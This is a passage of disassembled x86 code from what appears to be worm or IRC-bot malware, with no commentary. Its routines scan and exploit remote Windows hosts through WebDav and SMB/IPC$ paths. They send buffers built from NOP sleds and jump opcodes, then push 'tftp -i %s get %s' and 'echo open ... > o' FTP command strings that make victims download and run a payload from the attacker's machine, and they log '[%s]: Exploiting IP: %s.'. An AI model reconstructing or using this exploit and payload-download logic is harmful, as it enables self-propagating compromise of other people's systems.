call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_412A3C
push ebx
call sub_414A14
push [ebp+var_C]
call sub_414A14
pop ecx
pop ecx
push esi
jmp loc_412849
; ---------------------------------------------------------------------------
loc_412A3C: ; CODE XREF: sub_4127BC+268�j
push edi
push 1388h
push ebx
push esi
call dword_43575C ; recv
push ebx
call sub_414A14
push [ebp+var_C]
call sub_414A14
pop ecx
pop ecx
push esi
call dword_4358F4 ; closesocket
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_12C]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp+var_210]
push 200h
push eax
call sub_41483D
add esp, 14h
cmp [ebp+arg_138], edi
jnz short loc_412AB5
push edi
push [ebp+arg_134]
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+arg_98]
push eax
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_412AB5: ; CODE XREF: sub_4127BC+2D7�j
lea eax, [ebp+var_210]
push eax
call sub_401EFF
mov eax, [ebp+arg_12C]
imul eax, 3Ch
lea eax, dword_42B070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
loc_412AD6: ; CODE XREF: sub_4127BC+95�j
pop edi
pop esi
pop ebx
leave
retn
sub_4127BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412ADB proc near ; CODE XREF: sub_412B6F+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
mov ecx, [edx]
push edi
xor edi, edi
and [ebp+var_8], edi
xor eax, eax
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_412AFC
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_412AFC: ; CODE XREF: sub_412ADB+19�j
push ebx
push esi
loc_412AFE: ; CODE XREF: sub_412ADB+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_412B0C
cmp [ebp+var_4], eax
jnz short loc_412B54
loc_412B0C: ; CODE XREF: sub_412ADB+2A�j
test edi, edi
jnz short loc_412B49
cmp bl, 2Dh
jnz short loc_412B3D
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_412B3D
cmp al, 5Dh
jz short loc_412B3D
cmp [ebp+var_4], edi
jnz short loc_412B3D
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_412B49
cmp bl, al
jg short loc_412B49
mov [edx], esi
jmp short loc_412B46
; ---------------------------------------------------------------------------
loc_412B3D: ; CODE XREF: sub_412ADB+38�j
; sub_412ADB+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_412B49
loc_412B46: ; CODE XREF: sub_412ADB+60�j
xor edi, edi
inc edi
loc_412B49: ; CODE XREF: sub_412ADB+33�j
; sub_412ADB+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_412AFE
; ---------------------------------------------------------------------------
loc_412B54: ; CODE XREF: sub_412ADB+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_412B61
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_412B61: ; CODE XREF: sub_412ADB+7E�j
cmp edi, eax
jnz short loc_412B6A
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_412B6A: ; CODE XREF: sub_412ADB+88�j
mov eax, edi
pop edi
leave
retn
sub_412ADB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412B6F proc near ; CODE XREF: sub_408A18+5BFA�p
; sub_412C03+65�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_412BD1
; ---------------------------------------------------------------------------
loc_412B7B: ; CODE XREF: sub_412B6F+66�j
cmp eax, 1
jnz short loc_412BE2
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_412BE2
cmp cl, 2Ah
jz short loc_412BBA
cmp cl, 3Fh
jz short loc_412B9F
cmp cl, 5Bh
jz short loc_412BA4
xor eax, eax
cmp cl, dl
setz al
loc_412B9F: ; CODE XREF: sub_412B6F+22�j
inc [ebp+arg_4]
jmp short loc_412BCD
; ---------------------------------------------------------------------------
loc_412BA4: ; CODE XREF: sub_412B6F+27�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
inc esi
push eax
mov [ebp+arg_0], esi
call sub_412ADB
mov esi, [ebp+arg_0]
jmp short loc_412BCB
; ---------------------------------------------------------------------------
loc_412BBA: ; CODE XREF: sub_412B6F+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_412C03
mov esi, [ebp+arg_0]
dec esi
loc_412BCB: ; CODE XREF: sub_412B6F+49�j
pop ecx
pop ecx
loc_412BCD: ; CODE XREF: sub_412B6F+33�j
inc esi
mov [ebp+arg_0], esi
loc_412BD1: ; CODE XREF: sub_412B6F+A�j
mov cl, [esi]
test cl, cl
jnz short loc_412B7B
jmp short loc_412BE2
; ---------------------------------------------------------------------------
loc_412BD9: ; CODE XREF: sub_412B6F+76�j
cmp eax, 1
jnz short loc_412BFE
inc esi
mov [ebp+arg_0], esi
loc_412BE2: ; CODE XREF: sub_412B6F+F�j
; sub_412B6F+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_412BD9
cmp eax, 1
jnz short loc_412BFE
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_412BFE
cmp byte ptr [esi], 0
jnz short loc_412BFE
xor eax, eax
inc eax
jmp short loc_412C00
; ---------------------------------------------------------------------------
loc_412BFE: ; CODE XREF: sub_412B6F+6D�j
; sub_412B6F+7B�j ...
xor eax, eax
loc_412C00: ; CODE XREF: sub_412B6F+8D�j
pop esi
pop ebp
retn
sub_412B6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412C03 proc near ; CODE XREF: sub_412B6F+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
inc dword ptr [esi]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
xor ebx, ebx
jmp short loc_412C32
; ---------------------------------------------------------------------------
loc_412C1D: ; CODE XREF: sub_412C03+35�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_412C2E
cmp cl, 2Ah
jnz short loc_412C3A
cmp cl, 3Fh
jnz short loc_412C30
loc_412C2E: ; CODE XREF: sub_412C03+1F�j
inc dword ptr [edi]
loc_412C30: ; CODE XREF: sub_412C03+29�j
inc dword ptr [esi]
loc_412C32: ; CODE XREF: sub_412C03+18�j
mov ecx, [edi]
cmp [ecx], bl
mov eax, [esi]
jnz short loc_412C1D
loc_412C3A: ; CODE XREF: sub_412C03+24�j
cmp byte ptr [eax], 2Ah
jnz short loc_412C49
loc_412C3F: ; CODE XREF: sub_412C03+44�j
inc eax
mov ecx, eax
mov [esi], eax
cmp byte ptr [ecx], 2Ah
jz short loc_412C3F
loc_412C49: ; CODE XREF: sub_412C03+3A�j
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_412C66
cmp [eax], bl
jz short loc_412C59
xor eax, eax
jmp short loc_412CCB
; ---------------------------------------------------------------------------
loc_412C59: ; CODE XREF: sub_412C03+50�j
cmp dl, bl
jnz short loc_412C66
cmp [eax], bl
jnz short loc_412C66
xor eax, eax
inc eax
jmp short loc_412CCB
; ---------------------------------------------------------------------------
loc_412C66: ; CODE XREF: sub_412C03+4C�j
; sub_412C03+58�j ...
push ecx
push eax
call sub_412B6F
test eax, eax
pop ecx
pop ecx
jnz short loc_412CB5
loc_412C73: ; CODE XREF: sub_412C03+B0�j
inc dword ptr [edi]
mov ecx, [esi]
mov eax, [edi]
mov cl, [ecx]
cmp cl, [eax]
jz short loc_412C97
loc_412C7F: ; CODE XREF: sub_412C03+92�j
mov ecx, [esi]
cmp byte ptr [ecx], 5Bh
jz short loc_412C97
cmp [eax], bl
jz short loc_412CAC
inc eax
mov [edi], eax
mov ecx, [esi]
mov cl, [ecx]
mov edx, eax
cmp cl, [edx]
jnz short loc_412C7F
loc_412C97: ; CODE XREF: sub_412C03+7A�j
; sub_412C03+81�j
cmp [eax], bl
jz short loc_412CAC
push eax
push dword ptr [esi]
call sub_412B6F
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_412CB1
; ---------------------------------------------------------------------------
loc_412CAC: ; CODE XREF: sub_412C03+85�j
; sub_412C03+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_412CB1: ; CODE XREF: sub_412C03+A7�j
cmp eax, ebx
jnz short loc_412C73
loc_412CB5: ; CODE XREF: sub_412C03+6E�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_412CC8
mov eax, [esi]
cmp [eax], bl
jnz short loc_412CC8
mov [ebp+var_4], 1
loc_412CC8: ; CODE XREF: sub_412C03+B6�j
; sub_412C03+BC�j
mov eax, [ebp+var_4]
loc_412CCB: ; CODE XREF: sub_412C03+54�j
; sub_412C03+61�j
pop edi
pop esi
pop ebx
leave
retn
sub_412C03 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 3D4h
and dword ptr [ebp-10h], 0
push ebx
push esi
push edi
mov esi, offset dword_428AF0
lea edi, [ebp-24h]
movsd
movsd
movsd
movsd
push 15Bh
movsw
mov dword ptr [ebp-44h], 6741A1CDh
mov dword ptr [ebp-40h], 6741A199h
mov dword ptr [ebp-3Ch], 6741A426h
mov dword ptr [ebp-38h], 67419E1Dh
mov dword ptr [ebp-34h], 67419CE8h
mov dword ptr [ebp-30h], 0FFB7DE9h
mov dword ptr [ebp-2Ch], 0FFB832Fh
call sub_414E7D
pop ecx
mov edi, eax
mov [ebp-4], edi
push 56h
xor eax, eax
pop ecx
rep stosd
stosw
stosb
mov ecx, [ebp-4]
mov edi, ecx
lea esi, [ebp-24h]
movsd
movsd
movsd
movsd
add ecx, 11h
movsw
mov edi, ecx
mov [ebp-28h], ecx
dec edi
loc_412D50: ; CODE XREF: .text:00412D56�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_412D50
mov esi, offset loc_428AEC
movsw
movsb
mov edi, ecx
dec edi
loc_412D63: ; CODE XREF: .text:00412D69�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_412D63
mov esi, offset aNilsisgay ; "NILSISGAY!!"
movsd
push 6
movsd
push 1
push 2
movsd
call dword_4357E8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_412FAD
and dword ptr [ebp-8], 0
lea esi, [ebp-44h]
mov [ebp-0Ch], esi
loc_412D94: ; CODE XREF: .text:00412F38�j
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_43585C ; inet_addr
push dword ptr [ebp+12Ch]
mov [ebp-20h], eax
call dword_435934 ; ntohs
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_4357A0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_412F24
mov edi, [ebp-28h]
not dword ptr [esi]
push 4
push esi
push edi
call sub_4144B0
mov eax, offset loc_42B248
add esp, 0Ch
mov ecx, eax
loc_412DEE: ; CODE XREF: .text:00412DF3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_412DEE
sub eax, ecx
mov esi, ecx
dec edi
loc_412DFA: ; CODE XREF: .text:00412E00�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_412DFA
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-4]
rep movsb
lea ecx, [eax+1]
loc_412E16: ; CODE XREF: .text:00412E1B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_412E16
push 0
sub eax, ecx
push eax
lea eax, [ebp-4]
push eax
push ebx
call dword_43587C ; send
test eax, eax
jz loc_412F21
mov esi, ds:dword_420000
push 3E8h
call esi ; Sleep
push ebx
call dword_4358F4 ; closesocket
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_43585C ; inet_addr
push 7BDh
mov [ebp-20h], eax
call dword_435934 ; ntohs
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_4357A0 ; connect
test eax, eax
jz loc_412F21
mov eax, offset byte_42BF44
push eax
push eax
push dword ptr [ebp+8]
call sub_407D51
pop ecx
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
mov edi, 190h
lea eax, [ebp-1D4h]
push edi
push eax
call sub_41483D
add esp, 18h
push dword_43533C
push dword ptr [ebp+8]
call sub_407D51
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp-1D4h]
push edi
push eax
call sub_41483D
add esp, 14h
push 0
add edi, 70h
push edi
lea eax, [ebp-3D4h]
push eax
push dword ptr [ebp+8]
call dword_43575C ; recv
test eax, eax
jle short loc_412F21
push 1F4h
call esi ; Sleep
lea eax, [ebp-1D4h]
lea edx, [eax+1]
loc_412F03: ; CODE XREF: .text:00412F08�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412F03
push 0
sub eax, edx
push eax
lea eax, [ebp-1D4h]
push eax
push ebx
call dword_43587C ; send
test eax, eax
jg short loc_412F40
loc_412F21: ; CODE XREF: .text:00412E2F�j
; .text:00412E83�j ...
mov esi, [ebp-0Ch]
loc_412F24: ; CODE XREF: .text:00412DD0�j
push ebx
call dword_4358F4 ; closesocket
inc dword ptr [ebp-8]
add esi, 4
cmp dword ptr [ebp-8], 7
mov [ebp-0Ch], esi
jb loc_412D94
jmp short loc_412FAD
; ---------------------------------------------------------------------------
loc_412F40: ; CODE XREF: .text:00412F1F�j
push ebx
call dword_4358F4 ; closesocket
lea eax, [ebp+0Ch]
push eax
loc_412F4B: ; DATA XREF: .rdata:off_42875C�o
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-3D4h]
push edi
push eax
mov dword ptr [ebp-10h], 1
call sub_41483D
add esp, 14h
cmp dword ptr [ebp+140h], 0
jnz short loc_412FA0
push 0
push dword ptr [ebp+13Ch]
lea eax, [ebp-3D4h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4056FB
add esp, 14h
loc_412FA0: ; CODE XREF: .text:00412F7D�j
lea eax, [ebp-3D4h]
push eax
call sub_401EFF
pop ecx
loc_412FAD: ; CODE XREF: .text:00412D84�j
; .text:00412F3E�j
mov eax, [ebp-10h]
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412FB5 proc near ; CODE XREF: sub_4130F8+3F8�p
var_5A4 = byte ptr -5A4h
var_1A4 = byte ptr -1A4h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_94 = dword ptr 9Ch
push ebp
mov ebp, esp
sub esp, 5A4h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+arg_4]
push eax
mov [ebp+var_14], 2
call dword_43585C ; inet_addr
mov [ebp+var_10], eax
xor eax, eax
mov ax, word_42CE18
push eax
call dword_435934 ; ntohs
xor ebx, ebx
push ebx
push 1
push 2
mov [ebp+var_12], ax
call dword_4357E8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_4], esi
jnz short loc_41300E
xor al, al
jmp loc_4130F3
; ---------------------------------------------------------------------------
loc_41300E: ; CODE XREF: sub_412FB5+50�j
push 10h
lea eax, [ebp+var_14]
push eax
push esi
call dword_4357A0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_4130E8
push ebx
mov edi, 400h
push edi
lea eax, [ebp+var_5A4]
push eax
push esi
call dword_43575C ; recv
push [ebp+arg_94]
lea eax, [ebp+arg_14]
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d>o&echo USER a>>o&echo a"...
mov esi, 190h
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_41483D
lea eax, [ebp+var_1A4]
add esp, 14h
lea ecx, [eax+1]
loc_413066: ; CODE XREF: sub_412FB5+B6�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_413066
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz short loc_4130E8
push 1F4h
call ds:dword_420000 ; Sleep
push offset byte_42BF44
push offset aS_5 ; "%s\r\n"
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_41483D
lea eax, [ebp+var_1A4]
add esp, 10h
lea edx, [eax+1]
loc_4130B4: ; CODE XREF: sub_412FB5+104�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4130B4
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz short loc_4130E8
push ebx
push edi
lea eax, [ebp+var_5A4]
push eax
push [ebp+var_4]
call dword_43575C ; recv
mov bl, 1
loc_4130E8: ; CODE XREF: sub_412FB5+69�j
; sub_412FB5+CF�j ...
push [ebp+var_4]
call dword_4358F4 ; closesocket
mov al, bl
loc_4130F3: ; CODE XREF: sub_412FB5+54�j
pop edi
pop esi
pop ebx
leave
retn
sub_412FB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4130F8 proc near ; CODE XREF: .text:0041361F�p
; .text:00413641�p
var_81DC = byte ptr -81DCh
var_8174 = byte ptr -8174h
var_6104 = byte ptr -6104h
var_6094 = byte ptr -6094h
var_55D0 = byte ptr -55D0h
var_402C = byte ptr -402Ch
var_402B = byte ptr -402Bh
var_2F98 = byte ptr -2F98h
var_24D4 = byte ptr -24D4h
var_24D3 = byte ptr -24D3h
var_24D0 = byte ptr -24D0h
var_2454 = byte ptr -2454h
var_1C84 = byte ptr -1C84h
var_17D9 = byte ptr -17D9h
var_14EC = byte ptr -14ECh
var_EAC = byte ptr -0EACh
var_8D0 = byte ptr -8D0h
var_830 = byte ptr -830h
var_6C8 = dword ptr -6C8h
var_6B8 = byte ptr -6B8h
var_394 = dword ptr -394h
var_390 = dword ptr -390h
var_384 = byte ptr -384h
var_124 = dword ptr -124h
var_114 = byte ptr -114h
var_FC = byte ptr -0FCh
var_FB = byte ptr -0FBh
var_AC = byte ptr -0ACh
var_A9 = byte ptr -0A9h
var_7F = byte ptr -7Fh
var_7D = byte ptr -7Dh
var_7C = byte ptr -7Ch
var_34 = byte ptr -34h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_140 = dword ptr 148h
arg_144 = dword ptr 14Ch
push ebp
mov ebp, esp
mov eax, 81DCh
call sub_414800
mov eax, ds:dword_428B9C
push ebx
mov [ebp+var_C], eax
mov eax, ds:dword_428BA0
push esi
mov [ebp+var_8], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_34]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_4145E5
add esp, 0Ch
xor eax, eax
loc_41312F: ; CODE XREF: sub_4130F8+4E�j
mov cl, [ebp+eax+var_34]
and [ebp+eax*2+var_FB], 0
mov [ebp+eax*2+var_FC], cl
inc eax
cmp eax, 28h
jl short loc_41312F
push 18h
pop ecx
mov esi, offset dword_42CA10
lea edi, [ebp+var_AC]
lea eax, [ebp+var_34]
rep movsd
lea edx, [eax+1]
loc_41315E: ; CODE XREF: sub_4130F8+6B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41315E
sub eax, edx
mov ecx, eax
lea esi, [ebp+var_FC]
lea edi, [ebp+var_7C]
lea eax, [ebp+var_34]
rep movsw
lea ecx, [eax+1]
loc_41317B: ; CODE XREF: sub_4130F8+88�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41317B
sub eax, ecx
lea edi, [ebp+eax*2+var_7D]
mov esi, (offset aC_4+3)
movsd
movsd
lea eax, [ebp+var_34]
movsb
lea ecx, [eax+1]
loc_413196: ; CODE XREF: sub_4130F8+A3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413196
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
mov [ebp+var_A9], al
lea eax, [ebp+var_34]
lea ecx, [eax+1]
loc_4131B2: ; CODE XREF: sub_4130F8+BF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4131B2
sub eax, ecx
shl al, 1
add al, 9
mov [ebp+var_7F], al
xor eax, eax
mov ax, word_42CE18
push eax
call dword_435934 ; ntohs
xor eax, 9999h
cmp [ebp+arg_144], 0
mov word_42C708, ax
mov eax, 90909090h
jz loc_4132C4
mov ecx, 36Bh
lea edi, [ebp+var_EAC]
rep stosd
mov eax, [ebp+arg_144]
imul eax, 3Ch
mov edx, dword_42CE58[eax]
mov eax, offset loc_42C658
mov ecx, eax
mov [ebp+var_6C8], edx
lea esi, [ecx+1]
loc_41321A: ; CODE XREF: sub_4130F8+127�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_41321A
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp+var_6B8]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov [ebp+var_394], 6EB06EBh
mov [ebp+var_390], edx
lea esi, [ecx+1]
loc_41324E: ; CODE XREF: sub_4130F8+15B�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_41324E
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_384]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_41326F: ; CODE XREF: sub_4130F8+193�j
mov cl, [ebp+eax+var_EAC]
and [ebp+eax*2+var_402B], 0
mov [ebp+eax*2+var_402C], cl
inc eax
cmp eax, 0DACh
jl short loc_41326F
and [ebp+var_24D4], 0
and [ebp+var_24D3], 0
mov edx, 714h
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_81DC]
rep stosd
stosw
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_6104]
rep stosd
stosw
jmp short loc_41332B
; ---------------------------------------------------------------------------
loc_4132C4: ; CODE XREF: sub_4130F8+F0�j
mov ecx, 1F4h
lea edi, [ebp+var_8D0]
rep stosd
mov eax, offset loc_42C658
mov ecx, eax
lea esi, [ecx+1]
loc_4132DB: ; CODE XREF: sub_4130F8+1E8�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_4132DB
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_830]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_C]
rep movsb
lea ecx, [eax+1]
loc_413300: ; CODE XREF: sub_4130F8+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413300
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp+var_C]
lea edi, [ebp+var_114]
rep movsd
mov ecx, eax
mov eax, dword_42CE58
and ecx, 3
rep movsb
mov [ebp+var_124], eax
loc_41332B: ; CODE XREF: sub_4130F8+1CA�j
mov esi, [ebp+arg_140]
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp+var_24D0]
rep stosd
stosb
movsx eax, [ebp+var_1]
push 0
add eax, 4
push eax
lea eax, [ebp+var_AC]
push eax
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_413368
loc_413361: ; CODE XREF: sub_4130F8+29A�j
; sub_4130F8+2C1�j ...
xor al, al
jmp loc_413500
; ---------------------------------------------------------------------------
loc_413368: ; CODE XREF: sub_4130F8+267�j
push 0
mov ebx, 640h
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43575C ; recv
xor edi, edi
push edi
push 68h
push offset dword_42CA78
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz short loc_413361
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43575C ; recv
push edi
push 0A0h
push offset dword_42CAE8
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz short loc_413361
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43575C ; recv
cmp [ebp+arg_144], edi
jz loc_413478
push 1Ah
pop ecx
mov esi, offset dword_42CCA8
lea edi, [ebp+var_81DC]
rep movsd
mov ecx, 6D6h
lea esi, [ebp+var_402C]
lea edi, [ebp+var_8174]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_42CD18
lea edi, [ebp+var_6104]
rep movsd
mov ecx, 297h
lea esi, [ebp+var_2F98]
lea edi, [ebp+var_6094]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_42CD90
lea edi, [ebp+var_55D0]
rep movsd
xor esi, esi
push esi
push 10FCh
lea eax, [ebp+var_81DC]
push eax
push [ebp+arg_140]
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz loc_413361
push esi
push ebx
lea eax, [ebp+var_14EC]
push eax
push [ebp+arg_140]
call dword_43575C ; recv
push esi
push 0FDCh
lea eax, [ebp+var_6104]
jmp short loc_4134BF
; ---------------------------------------------------------------------------
loc_413478: ; CODE XREF: sub_4130F8+2D9�j
push 1Fh
pop ecx
mov esi, offset dword_42CB90
lea edi, [ebp+var_24D0]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp+var_8D0]
lea edi, [ebp+var_2454]
rep movsd
pop ecx
mov esi, offset off_42CC10
lea edi, [ebp+var_1C84]
push 0
rep movsd
and [ebp+var_17D9], 0
push 0CF8h
lea eax, [ebp+var_24D0]
loc_4134BF: ; CODE XREF: sub_4130F8+37E�j
push eax
push [ebp+arg_140]
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz loc_413361
push 12Ch
call ds:dword_420000 ; Sleep
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+arg_0]
mov edi, esp
rep movsd
call sub_412FB5
add esp, 140h
test al, al
setnz al
loc_413500: ; CODE XREF: sub_4130F8+26B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4130F8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp-14h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
xor esi, esi
push eax
mov [ebp-4], esi
mov word ptr [ebp-14h], 2
call dword_43585C ; inet_addr
push dword ptr [ebp+12Ch]
mov [ebp-10h], eax
call dword_435934 ; ntohs
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_4357E8 ; socket
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jz loc_413601
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call dword_4357A0 ; connect
cmp eax, edi
jz loc_4135FA
push esi
push 89h
push offset dword_42C7F0
push ebx
call dword_43587C ; send
cmp eax, edi
jz short loc_4135FA
push esi
mov esi, 640h
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43575C ; recv
push 0
push 0A8h
push offset dword_42C880
push ebx
call dword_43587C ; send
cmp eax, edi
jz short loc_4135FA
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43575C ; recv
push 0
push 0DEh
push offset dword_42C930
push ebx
call dword_43587C ; send
cmp eax, edi
jz short loc_4135FA
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43575C ; recv
movsx eax, byte ptr [ebp-810h]
sub eax, 30h
jz short loc_41360C
dec eax
jz short loc_413608
loc_4135FA: ; CODE XREF: .text:0041356A�j
; .text:00413584�j ...
push ebx
call dword_4358F4 ; closesocket
loc_413601: ; CODE XREF: .text:00413555�j
xor eax, eax
jmp loc_4136CE
; ---------------------------------------------------------------------------
loc_413608: ; CODE XREF: .text:004135F8�j
push 0
jmp short loc_413630
; ---------------------------------------------------------------------------
loc_41360C: ; CODE XREF: .text:004135F5�j
push 2
push ebx
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_4130F8
add esp, 148h
test al, al
jnz short loc_413650
push 1
loc_413630: ; CODE XREF: .text:0041360A�j
push ebx
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_4130F8
add esp, 148h
test al, al
jz short loc_413657
loc_413650: ; CODE XREF: .text:0041362C�j
mov dword ptr [ebp-4], 1
loc_413657: ; CODE XREF: .text:0041364E�j
push ebx
call dword_4358F4 ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_4136CB
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-214h]
push 200h
push eax
call sub_41483D
push 0
push dword ptr [ebp+13Ch]
